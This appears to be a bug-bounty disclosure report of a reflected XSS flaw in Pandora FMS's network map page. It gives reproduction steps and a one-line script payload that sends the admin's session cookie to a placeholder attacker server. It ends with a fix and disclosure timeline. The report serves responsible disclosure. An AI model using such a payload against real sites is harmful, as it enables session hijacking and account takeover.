Reflected Cross Site Scripting leading to session hijacking in pandorafms/pandorafms


Reported on

Nov 1st 2022


Basic XSS:

XSS (Cross-Site Scripting) vulnerabilities arise when untrusted data gets interpreted as code in a web context. XSS attacks effectively make the attacker logged in as the target user, with the nasty addition of tricking the user into giving some information (such as their password) to the attacker, perhaps downloading and executing malware on the user's workstation.

Steps to reproduce:

  1. Get the request by hitting the help button in the "http://localhost:8080/pandora_console/index.php?sec=network&sec2=operation/agentes/pandora_networkmap". (As shown in POC).
  2. Add the payload in the "b" parameter in the request.
  3. Copy the URL with payload in it, and it to the user logged in as admin.
  4. When Admin user try to visit the malicious link payload will gets executed.
  5. Session Cookie will be send to the our controlled server.
  6. Once we gets the cookie we can log in as Admin using the same.

Proof of Concept

Payload Used:

<script>alert(document.cookie);var i=new Image;i.src="http://attacker_controlled_server/?"+document.cookie;</script>

POC Link:


Attacker can get the any user session cookie using this vulnerability, and can be logged into that users session. If Attacker gets the session of admin user he/she will have all the access of the application, and he/she can even delete the users.


  1. Generate HTML safely using a templating engine, or use a static JavaScript frontend to avoid HTML generation altogether.
  2. If you display untrusted HTML content on your website, purify it first and contain it in a sandboxed frame.
We are processing your report and will contact the pandorafms team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
We have contacted a member of the pandorafms team and are waiting to hear back a year ago
pandorafms/pandorafms maintainer has acknowledged this report a year ago
a year ago


@admin can we have a CVE for this issue ?

a year ago


Pandora is a CNA and they usually assign CVEs before public disclosure if the report portrays a valid vulnerability :)

pandorafms/pandorafms maintainer
a year ago


Fixed in v766 --> CVE-2022-45436

pandorafms/pandorafms maintainer validated this vulnerability 10 months ago
damodarnaik has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
pandorafms/pandorafms maintainer marked this as fixed in v766 with commit 2c7d7e 10 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
pandorafms/pandorafms maintainer published this vulnerability 10 months ago
to join this conversation